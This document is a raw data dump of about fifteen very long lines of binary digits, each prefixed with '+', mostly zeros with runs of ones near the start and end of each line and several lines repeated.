+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000000000000000000000001000100111100011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000001000110100100011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000001000111011111011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 